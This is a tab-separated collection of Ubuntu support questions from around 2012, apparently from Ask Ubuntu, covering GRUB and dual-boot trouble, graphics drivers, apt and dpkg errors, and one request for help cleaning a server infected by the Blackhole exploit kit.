149840	does a purchase from ubuntu software center of world of goo include updates and if so what is causing an unauthorized error message when updating ?	i purchased world of goo from the ubuntu software center about a month back and it works fine . recently though when i perform a sudo apt-get update i get the following output . w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/world-of-goo/ubuntu/dists/precise/main/binary-amd64/packages the requested url returned error : 401 w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/world-of-goo/ubuntu/dists/precise/main/binary-i386/packages the requested url returned error : 401 e : some index files failed to download . they have been ignored , or old ones used instead . can someone explain what all this means and what i can do to have it properly updated ? edit : i ran the following at the bash command line /etc/apt/sources.list.d/*.list | grep ppa which yielded the following output relevant to world of goo : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/world-of-goo/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf edit 2 : i have submitted a bug report to software-center on launchpad and written to the publisher . https : //bugs.launchpad.net/ubuntu/+source/software-center/+bug/1012131
149844	partitioning hard disk for dual boot	i have a 500 gb hard disk and i intend to dual boot it with windows and ubuntu . i want to reserve about 150 gb for windows and the rest of the 350 gb for ubuntu . 1 ) is the entire 350 gb is going to get used for file system ? 2 ) can i create partitions in linux like it can be done in windows ? eg : c : d : etc..
149847	where to find documentation about 12.04 's x11 configuration ?	from man pages to google results , most documentation explains how to interact with /etc/x11/xorg.conf , which simply does n't exist in my out-of-the-iso vanilla ubuntu 12.04 installation . so , where do i get documentation that actually explains how to interact with my xserver on ubuntu 12.04 ?
149849	how can i store files in an archive without compressing them on ubuntu 10.04 ?	i need to store files in archives , but not compress them . the archive manager that comes with ubuntu 10.04 takes too long , and does n't have the option to only store ( not compress ) files . any suggestions ?
149854	issues configuring oracle java 6 plugin in chromium	i 've been pulling my hair out trying to get oracle java running in chromium . my java version is shown below : java version `` 1.6.0_32 '' java ( tm ) se runtime environment ( build 1.6.0_32-b05 ) java hotspot ( tm ) server vm ( build 20.7-b02 , mixed mode ) in my bash_profile i have : export java_home=/usr/lib/jvm/jdk1.6.0_32 export path= $ path : $ java_home/bin 4 i 've tried linking as below : ln -s $ java_home/jre/lib/i386/libnpjp2.so /usr/lib/chromium-browser/plugins i had it working and then upgraded to 12.04 , and am now stuck .
149860	hdmi to vga - external monitor not detected	i have an acer iconia tab w500 running ubuntu 12.04 - the only output i have is an hdmi output so i bought an hdmi to vga cable to connect it to my external monitor . it 's not being detected by ubuntu . please let me know what other information you would like me to provide . thank you !
149864	how to configure x11 to find a font as requested by a proprietary binary	starting a proprietary binary i get the following error message : fatal error from x-windows : font not found : -*-*helvetica-bold-r-normal-*-11-*-*-*-*-*-*-* i 'm not quite experienced in handling with fonts , but as far as i understand that string -*-*helvetica-bold-r-normal-*-11-*-*-*-*-*-*-* should match a helvetica font , bold , in size 11 , which should be quite a normal font . after googling i tried the following things without result : $ sudo xlsfonts -fn -*-*helvetica-bold-r-normal-*-11-*-*-*-*-*-*-* xlsfonts : pattern `` -*-*helvetica-bold-r-normal-*-11-*-*-*-*-*-*-* '' unmatched # in case the `*` is a problem : $ sudo xlsfonts -fn -*-helvetica-bold-r-normal-*-11-*-*-*-*-*-*-* xlsfonts : pattern `` -*-helvetica-bold-r-normal-*-11-*-*-*-*-*-*-* '' unmatched also $ sudo mkfontdir $ sudo xset fp rehash did n't help . how can i find the problem ? and how to solve it ?
149866	how to prevent the automatic switch from an email in evolution/thunderbird to firefox when clicking on a hyperlink in the email ?	when i click on a hyperlink in an email ( ubuntu 12.04 , evolution 3.2.3 or thunderbird 12 , although it happened in previous versions as well ) , the program window ( evolution ) in focus changes to firefox ( default internet browser ) to open the webpage . i would like that it does not switch automatically from evolution to firefox with every clicked hyperlink as i would prefer to read the whole email first and then `` manually '' go to the firefox with the opened webpages . i know that it is possible to prevent this automatic change of program window ( email client to internet browser ) as in ubuntu 11.10 i had this preferred behaviour ( before i now installed ubuntu 12.04 ) . does anybody know where i can change the preferences for this issue ? thanks for any help , it bothers me daily .
149869	how install ubuntu on old compaq notebook ?	i have an old compaq notebook . i want to install ubuntu 12.04 . the notebook has these specs : amd athlon cpu 30 gb hd 512 mb memory 14 '' screen can i install on this notebook ? the notebook now has windows xp , but i do n't need to keep it . the notebook has cd and usb , is using usb faster ?
149872	how can i install windows xp and ubuntu 12.04 alongside each other ?	i 've got windows 7 with wubi 11.10 installed . i would like to replace that with a proper 12.04 installation alongside a new windows xp installation , but i 'm not sure what the best path would be . i ca n't figure out how to install winxp via usb -- my computer has no cd drive . i 'm not skilled enough to use ubuntu all the time , and my iphone requires me to run some windows version for the damn itunes software . i have all my data on the windows partition but also lots of apps and settings in ubuntu . i back up the data on the windows partition . i do n't mind having to re-do the ubuntu customizing . how can i install windows xp and ubuntu 12.04 alongside each other ? which one to install first ? i think either one will `` break '' the boot of the other one , so afterward i 'd have to repair the boot mechanism .
149876	how can i install one language by command-line	i 'm trying to have everything ready to install a new desktop with a few command line instructions . unfortunately , to install the language packages , i could n't find how to do it . i can run gnome-language-selector but it does n't seems to be usable in command line directly . i need to go on with clicks ... an other thing that could be done is that i do those clicks and find out which packages have been installed and read the changes in /etc/environment and /etc/default/locale ( and other /etc/ ... file ? ) but the list of packages is probably different depending on the packages installed ( firefox , thunderbird , libreoffice , gnome , ... ) is there a tool for that ? like let 's say : gnome-language-selector -- install fr or a package that has all necessary dependencies : sudo apt-get install super-language-pack-fr thanks ,
149889	access yahoo 's site and e-mail by firefox	i 'm starting using linux ( ubuntu 12.04 ) . i 've had many problems to access all yahoo 's pages . only yahoo , others sites i access well . i do n't know why it happens ! it only happens with yahoo 's pages . please see the images . i 'm using firefox browser . how i am new in this forum , i ca n't post images , then i put the url 's with them . yahoo e-mail login image : yahoo main page image : the images of yahoo pages are in portuguese because i 'm in brazil . i think this information is important : in my computer i have two operational systems ( windows 7 and ubuntu 12.04 ) . in the windows 7 using firefox the yahoo pages works normally .
149890	how to change the date format in nautilus list columns ?	the date format of the date columns is really long `` tue 12 june 2012 17:12:34 pht '' . i would prefer a shorter version , e.g . 12/06/2012 or 12/06/2012 17:12 . i tried to change it in settings/language support or time & date , but did not find an option to influence the length of the date/time format . any hint ?
149894	restart button missing in 12.04 ubuntu	can anyone possibly give me a solution to regain the restart button from the power button ( top right corner button ) , so that i can instantly shut down without any dialog box besides getting the ability to restart directly ?
149897	blackhole exploit kit - linux server script	it has come to our attention when scanning some of our hosted server websites that they have been infected with blackhole exploit kit ( top dollar hacking program - http : //nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit/ ) can someone advise on possible scripts to implement on an ubuntu 8.04 lts 64-bit machine to scan and remove these infected files or at least just mention if they have had previous experience with this and what method was used to get rid of the virus ? edit : the information below on wordpress was great , but its not only cms sites that are infected . which of the following would be the best course of action ? change all the control panel and ftp details ? run clamav ( with no working heal function ) and remove the files per hand all day long ? shut down the server and update the plesk and ubuntu ? ( this is a problem as we make use of a homebrew expand server , and expand does not support anything above plesk 9 ) . look at the httpd_access_log and identify a certain subnet and block it in iptables ?
149898	how do i install another ubuntu 12.04 , while one exists inside windows 7 through wubi	i am trying to install one more instance of ubuntu 12.04 on my machine so that i can play around with its drivers . i want the already installed version ( done through wubi on my windows 7 ) , to be untouched . so overall , my computer currently has 2 operating systems.one being windows 7 , and the other being ubuntu 12.04 installed through wubi . what would be the least invasive way to install another ubuntu 12.04 ? can i do it using a bootup disk/flash just like i do a normal install , or do it through wubi itself ? ps : i do not want to lose any data . there is a lot of stuff on my laptop .
149901	copy files to an smb share as non-root user	i would like to access and copy some files to an smb share . these commands work with sudo , no username/password is needed : mount.cifs //192.168.1.1/share ~/share/ -o rw cp *pdf share/ umount share/ is there a way to do this as non-root user ?
149902	how to get launcher to show all instances of an application	this bug was fixed shorty after 12.04 was released . well , i liked the old behaviour , especially showing all instances of an application on all desktops when doubleclicking the launcher icon . how do i get that functionality back ?
149915	tweaks and configuration for radeon open source driver	can i tweak or configure radeon driver to reduce overheating . my gpu gets 70-80c temp on start . i do n't want catalyst by now because they are very slow for 2d . using mobility hd4570 , ubuntu 12.04 x64 3.2.0-24-generic .
149921	how to add a command permanently to grub2	i have a fairly special setup , using linux on a macbook laptop . to switch off my secondary graphics card in it i 'm required to add these lines to my grub outb 0x728 1 outb 0x710 2 outb 0x740 2 outb 0x750 0 i do this by pressing 'e ' for my selected grub menu option and adding the lines one by one . then finally booting . but as we know it 's not permanent . i cant really figure out where i need to add it for grub to always append it to my linux boot options . it 's does n't seem to belong in /etc/default/grub since here i can add stuff to the kernel boot line honestly i 'm afraid to fiddle to much with grub on my computer since getting it to triple boot linux/mac/windows was a very delicate and timely matter . does anyone have any idea of where to add it ?
149922	how to make nautilus to mount at `/drivename` instead of `/media/drivename` ?	i want to mount my other drives ( mostly ntfs and fat ) on /drivename by clicking on the drive icon in the nautilus side pane , where `` drivename '' refers to the label of the drive . by default nautilus mounts drives with name drivename in /media/drivename folder . my question is : how can i make nautilus to do like that ? i do n't want to use fstab : please do not suggest doing this by editing /etc/fstab file . i want this feature in nautilus and after clicking the drive should also be seen in the side pane . ( should not be hidden ) . edit : seems there are some misunderstanding with this question . i do n't want to mount in the drive / , i.e all contents of a drive in / . what i want is when i mount a drive with drive name `` main '' , that drive will get mounted at /main instead of /media/main .
149923	braid , bastion showing black polygons	i just got the humble bundle 5 and am suffering severe graphical defects on braid and bastion . both games run but do not display properly . sound , mouse etc . work fine . here are some screens of bastion : i could n't get a screen of braid . i think its main problem is alpha support ( all textures , even stair texttures etc. , remain square and overlap the character ) . i 'm on ubuntu 12.04 with a mesa intel 915g graphics card ( according to amnesia : ) , which has no support whatsoever for my card ) . is there anything i can install/fix to remedy these graphical problems , or do i need to fork over the cash for a new graphics card ?
149927	will 12.04 lts install on my old computer ?	my old computer has a soyo syk7v dragon plus mobo . 1 gb pc2100 ram , fx5500 ddr agp video card and 80gb hdd . will the ubuntu 12.04 lts install on this computer ? reason for asking is because i keep getting an `` unrecoverable error '' each time i try . i forget to mention that the cpu is an amd athlon xp1900 socket a .
149928	nullmailer in /var/log/syslog	i 'm getting a lot of messages like these : me @ home : /etc/snmp $ tail /var/log/syslog jun 12 17:52:15 home nullmailer [ 1238 ] : starting delivery : protocol : smtp host : mail . file : 1339502401.24665 jun 12 17:52:15 home nullmailer [ 7086 ] : smtp : failed : connect failed jun 12 17:52:15 home nullmailer [ 1238 ] : sending failed : host not found jun 12 17:52:15 home nullmailer [ 1238 ] : starting delivery : protocol : smtp host : mail . file : 1339174804.27614 jun 12 17:52:15 home nullmailer [ 7087 ] : smtp : failed : connect failed jun 12 17:52:15 home nullmailer [ 1238 ] : sending failed : host not found jun 12 17:52:15 home nullmailer [ 1238 ] : starting delivery : protocol : smtp host : mail . file : 1339324201.21737 jun 12 17:52:15 home nullmailer [ 7088 ] : smtp : failed : connect failed jun 12 17:52:15 home nullmailer [ 1238 ] : sending failed : host not found jun 12 17:52:15 home nullmailer [ 1238 ] : delivery complete , 331 message ( s ) remain . the problem is , i do n't recall sending anything . how do i find out which software is sending these messages ? how do i read them ?
149929	ubuntu recognized by os-prober but not grub	i am dual-booting windows 7 and ubuntu 12.04 . i reduced my windows 7 partition and increased my ubuntu partition using gparted from a 12.04 live cd . everything was fine for about a week . then the other day i booted and was met with `` grub rescue . '' i purged and re-installed both grub and then grub2 as per the many tutorials on line , but all efforts have met with the same results : it seems that os-prober sees my 2 windows 7 ( actual and restore ) partitions , as well as the ubuntu 12.04 lts partition ; but when i run any variant of update-grub or update-grub2 , it only detects the 2 windows 7 partitions . as a result i can not boot into ubuntu ( which is where 99 % of my work is ) . here is the output of bootinfoscript : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda5 and looks at sector 525161552 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda6 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 206,848 504,360,959 504,154,112 7 ntfs / exfat / hpfs /dev/sda3 591,218,688 625,137,663 33,918,976 7 ntfs / exfat / hpfs /dev/sda4 504,360,960 591,218,687 86,857,728 5 extended /dev/sda5 * 504,363,008 583,360,511 78,997,504 83 linux /dev/sda6 583,362,560 591,218,687 7,856,128 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 da669d8c669d69d1 ntfs system reserved /dev/sda2 baaaa703aaa6baf1 ntfs /dev/sda3 8e22d1e022d1ccf9 ntfs os recovery /dev/sda5 c35e7a0a-408c-4586-8a18-b3faa368ef3f ext4 /dev/sr0 iso9660 ubuntu 12.04 lts amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev /mnt/dev none ( rw , bind ) /dev/pts /mnt/dev/pts none ( rw , bind ) /dev/sda2 /media/baaaa703aaa6baf1 fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda5 /media/c35e7a0a-408c-4586-8a18-b3faa368ef3f ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sda5 /mnt ext4 ( rw ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda5/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root c35e7a0a-408c-4586-8a18-b3faa368ef3f if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root c35e7a0a-408c-4586-8a18-b3faa368ef3f set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root da669d8c669d69d1 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda5/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=c35e7a0a-408c-4586-8a18-b3faa368ef3f / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation # uuid=a4d335d5-6a81-4af8-a1c7-3beeee8699a1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda5 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 ========= devices which do n't seem to have a corresponding hard drive : ========= sdb =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in and of sudo os-prober from 12.04 livecd : /dev/sda1 : windows 7 ( loader ) : windows : chain /dev/sda2 : windows 7 ( loader ) : windows1 : chain /dev/sda5 : ubuntu 12.04 lts ( 12.04 ) : ubuntu : linux i have read pretty much every guide , tutorial and question that exists out there for updating any version of grub , but nothing has worked . but what is most confusing is that os-prober sees the installation ; i would very much appreciate any assistance in this matter .
149942	ca n't connect to internet	i am new to linux and i am using ubuntu 12.04lts . i installed it using wubi . i ca n't connect to internet . i try to connect by clicking on the network icon in the top-right corner . then i takes the option 'wired connection 1 ' and it starts connecting . then it shows 'disconnected ' . it takes a lot of time connecting . i just installed it a few days ago and i have not been able to connect yet .
149944	ca n't run init script on boot after another init script	i have three init scripts and the broker init script runs fine , but when i try to run the consumer init script and then the data collector init script , the only process that is running is the broker . i added the symbolic links to the run levels using update-rc.d for each script and i also changed the number prefixes in the symbolic links to try and run the scripts in the proper order but that did not work . i am able to run the scripts from the terminal and they work fine but they need to all be started on boot . any ideas as to why my other scripts are not running ? also inside my consumer and data collector i am running : su user1 -c 'java -jar foo.jar' to start the services . also the consumer java class sits and waits for a message from the queue , so the java code does not stop until i specify the stop argument for the init script . the broker has to start first , then the consumer , then the data collector . adding the symbolic links for the runlevels : sudo update-rc.d broker defaults 10 90 sudo update-rc.d consumer defaults 15 85 sudo update-rc.d datacollector defaults 20 80
149945	install ruby ubuntu with update-alternatives command	i have 2 questions about ruby on ubuntu . i 've already install ruby1.8 and ruby1.9.1 on ubuntu lucid but when i run `` update-alternatives -- config ruby '' on terminal then the output is `` update-alternatives : error : no alternatives for ruby . '' how to fix this ? what 's difference and advantages to install ruby on ubuntu by using rvm and update-alternatives ? sorry if my english 's language is not good enough . : d thanks
149946	using a backup disk made in windows vista to reinstall programs an files in ubuntu	i 'm getting ready to transfer over to ubuntu from windows vista . i was wondering if i could use a backup disc made in windows vista ( using the default backup/restore program ) to restore the files to ubuntu once i wipe the hard drive clean and install ubuntu ?
149951	how do i install a 32-bit proprietary deb on a 64-bit system without causing dependency problems ?	i know guitar pro does n't support 64 bit , but i did get it to work with this command jeggy @ jeggy-xps : ~ $ sudo dpkg -- force-architecture -i guitarpro6-rev9063.deb [ sudo ] password for jeggy : selecting previously unselected package guitarpro6 : i386 . ( reading database ... 285729 files and directories currently installed . ) unpacking guitarpro6 : i386 ( from guitarpro6-rev9063.deb ) ... dpkg : dependency problems prevent configuration of guitarpro6 : i386 : guitarpro6 : i386 depends on gksu . dpkg : error processing guitarpro6 : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : guitarpro6 : i386 and even after i get that error the program perfectly works fine and updating and adding ppa 's to the system works great , but when i 'm trying to install some other software i get this error : jeggy @ jeggy-xps : ~ $ sudo apt-get install elinks reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : elinks : depends : libfsplib0 ( > = 0.9 ) but it is not going to be installed depends : liblua50 ( > = 5.0.3 ) but it is not going to be installed depends : liblualib50 ( > = 5.0.3 ) but it is not going to be installed depends : libtre5 but it is not going to be installed depends : elinks-data ( = 0.12~pre5-7ubuntu1 ) but it is not going to be installed guitarpro6 : i386 : depends : gksu : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and whenever i write `` apt-get -f install '' i get this jeggy @ jeggy-xps : ~ $ sudo apt-get -f install [ sudo ] password for jeggy : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : dconf-gsettings-backend : i386 python-levenshtein python-indicate libav-tools libstartup-notification0 : i386 libxmuu1 : i386 libavfilter-extra-2 libbabl-0.0-0 libgegl-0.0-0 libgconf2-4 : i386 python-vobject libgtk-3-0 : i386 libpam-cap : i386 python-utidylib libdconf0 : i386 python-iniparse python-xmpp libpam-gnome-keyring : i386 libxcb-util0 : i386 python-farstream use 'apt-get autoremove ' to remove them . the following packages will be removed : guitarpro6 : i386 0 upgraded , 0 newly installed , 1 to remove and 7 not upgraded . 1 not fully installed or removed . after this operation , 84,0 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 286979 files and directories currently installed . ) removing guitarpro6 : i386 ... dpkg : warning : while removing guitarpro6 : i386 , directory '/opt/guitarpro6/updater ' not empty so not removed . dpkg : warning : while removing guitarpro6 : i386 , directory '/opt/guitarpro6/data/soundbanks ' not empty so not removed . processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... and now guitar pro is deleted . how can i install guitar pro and still be able to install other software afterwards ?
149952	is juju specific to ubuntu os on ec2	is ubuntu juju specific to ubuntu os on ec2 . i mean can we use juju bootstrap default-series for other operating systems like centos etc .
149955	imac g5 with no os nor cd drive	what i want : ubuntu on a g5 imac . what i have : an empty pc ( intel g5 17 '' imac ) with broken cd drive . its model is a1173 . this pc with ubuntu 12.04 and an old vista partition . a usb flash drive . problems : no cd means the only boot drive i could use is usb . there are no bios on macs so i ca n't set boot settings or even see if it detects my usb drive . when i start the machine and press alt the first and only thing i see is an old corrupted winxp partition and not a single option or additional information . so assuming blindly that the mac hardware/firmware works normally , i do n't have any mac os to use any of the tools that i found on different tutorials for building a bootable .img drive for macs . i ca n't find much software on linux/windows to substitute to those tools , for example among others converting an .iso file ( win/linux ) to .img ( mac i guess ) . which makes me think that the scenario where someone like me has mac hardware but no mac os is extremely rare . so other than finding someone that has a mac i have no solution . so i ask what would you do ? the only thing is it should not involve any money ( i know mac soft is rarely free ) which also excludes getting any macos unless i can use a free macos.img for vm or restore the original mac for free . thank you
149958	gedit embeded terminal showing both background and foreground in white color	i am using ubuntu 12.04.i am using gedit with one of the plugin called embeded terminal which is used to place the terminal attached at the bottom part of the gedit.now my problem is in that embeded terminal both the screen background and text is in white color , so its difficult to see any text there.i tried to configure the fonts in dconf editor.but there was not any good result.here i am attaching the screenshot of the configuration of dconf editor that i have changed.so please help me to solve this.any help will be highly appreciable .
149960	error creating an .img file from an .iso ( md5 verified )	i was following the instructions on this website to create a bootable usb flash drive on a mac : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx the instruction : hdiutil convert -format udrw -o ~/path/to/target.img ~/path/to/ubuntu.iso does not create a valid file that the disk utility can copy to the usb drive , making installation on a usb drive useless . i 've been repeating these instructions for days with no luck . the only thing that does not work is the .iso to .img conversion . is there a way to download ubuntu 12.04 lts 64-but desktop in a .img file already ? unfortunately , my install notebook does not have an optical drive so usb is the only way . thanks for your help !
149970	gnome shell does not work ?	i installed gnome shell but when i start it it 's the design of gnome classic ... what can i do ? i already reinstalled it . i have ubuntu 11.10 .
149971	how do you remap a key to the caps lock key in xubuntu ?	i 'm using xubuntu 12.04 . how do i either swap or remap the control ( or any key ) and caps lock keys ?
149982	wifi switch on after waking up from suspend	i recently installed ubuntu 12.04 on my acer aspier 4752 notebook . first it seems that the wifi was not working , but after reading some of the answers in community and trying out different things i found out that i have to press the fn+f3+f3 : ) . meaning that i had to press the f3 twice to get the wifi enabled . the first press only enabled bluetooth . but the problem is event though the wifi is disabled ( hw switch ) when the notebook wake up from a suspend session it switch on the wifi and my wify led starts to glow . i tried removing acer_wmi and waking up from suspend but it did n't solve the problem . so do we have any solution for this ? is there any way we could at least run a command to disabled this on wakeup ?
149984	formatting usb flash memory for ubuntu ext4	a new usb flash memory viewed in disk utility has partition type fat and type is also fat . i want to use this device for my tar backups and i have no need for portability to windows so i decided to click on format volume to convert it to ext4 . the type changed to ext4 but to my surprise partition type is still fat , specifically w95 fat32 lba 0x0c . i can click edit partition to change this and there are many choices . does this choice matter , or in other words , should i also change partition type and what should it be changed to ? a couple of choices are linux and linux extended . edit interestingly , when i selected linux for the partition type the program proceeded to run the hard disk for about 10 minutes . scary , i know . the hard disk is run even though the utility clearly shows that it is the usb drive that has been selected for information display and modifications . then it reported that there was some sort of failure but there was not enough memory to report the problem to developers .
149989	how can i get my ati / amd drivers to work with any kernel above 3.2.0.x ?	how can i get my ati / amd drivers to work with any kernel above 3.2.0.x ? what did work installed original amd64 version of ubuntu 12.04 iso image . burned dvd and installed which shown kernel 3.2.0-23 to begin with . got 5.1 surround sound working . got ati ( now its amd ) video drivers installed for my radeon hd r6870 video card from amd 's website . fglrxinfo came up and reported as normal . the problem kernel 3.2.0.x kept locking up so i tried higher kernel versions . but ati / amd drivers do not install on any kernel above 3.2.0.x what i have tried i have gone over this tutorial many times ( https : //help.ubuntu.com/community/binarydriverhowto/ati ) and it does n't work on any kernel except 3.2.0.x . the problems i am having here are that the ati / amd drivers working for the 12.04 precise with kernel 3.2.0-23 and 24 , but the computer kept locking up . although all my games would work , the lock ups were random and were constant . so i looked all over the web for 3 days trying to find an answer and the lock up issue was said to just update the kernel . so i did . have tried many kernels . all of them .. no lock ups . but the restricted amd drivers from the amd website will not install . and none of the opensource amd drivers have ever installed no matter what kernel or version i tried . example output of 3d type of errors javax.media.opengl.glexception : glxgetconfig failed : error code glx_no_extension at com.sun.opengl.impl.x11.x11gldrawablefactory.glxgetconfig ( x11gldrawablefactory.java:651 ) at com.sun.opengl.impl.x11.x11gldrawablefactory.xvi2glcapabilities ( x11gldrawablefactory.java:350 ) at com.sun.opengl.impl.x11.x11gldrawablefactory.choosegraphicsconfiguration ( x11gldrawablefactory.java:174 ) at javax.media.opengl.glcanvas.choosegraphicsconfiguration ( glcanvas.java:520 ) at javax.media.opengl.glcanvas. < init > ( glcanvas.java:131 ) at haven.havenpanel. < init > ( havenpanel.java:68 ) at haven.havenpanel. < init > ( havenpanel.java:78 ) at haven.mainframe. < init > ( mainframe.java:182 ) at haven.mainframe.main2 ( mainframe.java:306 ) at haven.mainframe.access $ 100 ( mainframe.java:34 ) at haven.mainframe $ 7.run ( mainframe.java:360 ) at java.lang.thread.run ( thread.java:722 ) and of course this is what fglrxinfo shows : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 139 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 edit : i forgot to mention that i did look at this post over the last few days and it did not help .
149992	fan on acer aspire 5315 not working	i have recently installed ubuntu 12.04 on my old laptop ( acer aspire 5315 ) and observed that fan is not working properly on ubuntu . how could i solve this problem ?
